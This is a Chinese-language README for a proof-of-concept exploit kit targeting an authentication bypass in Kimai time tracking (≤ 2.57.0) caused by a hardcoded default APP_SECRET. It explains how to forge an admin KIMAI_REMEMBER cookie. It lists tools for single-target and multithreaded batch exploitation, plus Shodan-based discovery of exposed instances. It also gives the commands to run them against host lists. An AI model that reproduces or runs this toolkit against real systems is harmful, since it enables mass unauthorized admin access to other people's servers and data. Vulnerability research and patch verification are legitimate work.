CVE-2026-52824(GHSA-jr9p-4h4j-6c58)的 PoC 漏洞利用 — Kimai 时间跟踪默认 APP_SECRET 身份验证绕过,影响版本 ≤ 2.57.0
注意: 仓库 URL 中包含了一个过时的 CVE ID(CVE-2026-49865)。本仓库中跟踪的正确且当前的 CVE 是 CVE-2026-52824(GHSA-jr9p-4h4j-6c58)。
针对 Kimai 时间跟踪(版本 ≤ 2.57.0)中硬编码默认 APP_SECRET 漏洞的概念验证利用工具包。允许在未修补的 Docker 部署上通过伪造的 KIMAI_REMEMBER cookie 绕过认证。
当 CVE-2026-52824 发布时——一个 CVSS 9.1 的严重漏洞,硬编码的默认密钥存在于数千名自托管者使用的 Docker 镜像中——技术社区都知道了它,修复程序也在 2.58.0 中发布。但没有人发布可用的概念验证。
所以我仅凭安全公告就重建了它。
攻击链:Kimai 在 Docker 和 .env.dist 中附带 APP_SECRET=change_this_to_something_unique。在 v2.57.0 中,记住我 cookie 的 signature_properties 为空,因此 FieldsHash 退化为一个常量(SHA256(''))。将已知密钥与空哈希结合,你就可以为任何用户 id 伪造 KIMAI_REMEMBER cookie——包括管理员(id:1)。
本仓库是完整可用的工具包,可在任何未修补的实例上从安全公告直达管理员会话。
| 字段 | 值 |
|---|---|
| CVE | CVE-2026-52824 |
| GHSA | GHSA-jr9p-4h4j-6c58 |
| CVSS | 9.1(严重) |
| CWE | CWE-1188 — 不安全的默认资源初始化 |
| 受影响 | Kimai ≤ 2.57.0(Docker 镜像 / .env.dist) |
| 已修复 | 2.58.0 |
| 致谢 | Trent M.(AzureADTrent) |
Kimai 在其 Docker 镜像和 .env.dist 中附带硬编码的默认 APP_SECRET:
APP_SECRET=change_this_to_something_unique
在 v2.57.0 中,记住我 cookie 的 signature_properties 为空,使 FieldsHash 成为一个常量(SHA256(''))。结合已知密钥,任何人都可以为任何用户——包括管理员——伪造有效的 KIMAI_REMEMBER cookie。
APP_SECRET → 计算 HMAC-SHA256 签名KIMAI_REMEMBER cookie| 方面 | v2.57.0(易受攻击) | v2.58.0(已修补) |
|---|---|---|
| Dockerfile | ENV APP_SECRET=change_this_to_something_unique | 无硬编码默认值 |
| entrypoint.sh | 无密钥生成 | 首次启动时生成 bin2hex(random_bytes(32)) |
| 存储 | 不适用 | 持久化于 /opt/kimai/var/data/.appsecret |
| 文件 | 用途 |
|---|---|
exploit.py | 单目标利用——伪造 cookie 并认证 |
batch_pwn.py | 针对主机列表的多线程批量利用 |
quick_scan.py | 两阶段扫描器——快速过滤然后深度探测 |
deep_probe.py | 通过多个端点进行版本检测 |
probe_batch.py | 从文件探测主机的版本 + 漏洞 |
shodan-scanner.py | 用于发现 Kimai 实例的 Shodan 集成 |
git clone https://github.com/cyeezy08/Kimai-CVE-2026-49865-POC.git
cd Kimai-CVE-2026-49865-POC
pip install -r requirements.txt
python3 exploit.py https://kimai.example.com
python3 exploit.py https://kimai.example.com admin --dump
# From a file of URLs
python3 batch_pwn.py kimai_hosts.txt results.txt 30
export SHODAN_API_KEY="your_key"
python3 shodan-scanner.py --search --output kimai_hosts.txt
python3 deep_probe.py kimai_hosts.txt versioned_results.txt
python3 quick_scan.py hosts_file.txt
requests — HTTP 客户端shodan — Shodan API 客户端(仅用于 shodan-scanner.py)本工具包仅供授权的安全测试和研究使用。未经授权访问计算机系统是违法的。测试前请务必获得适当授权。作者对滥用不承担任何责任。
MIT idk iam tired ok thx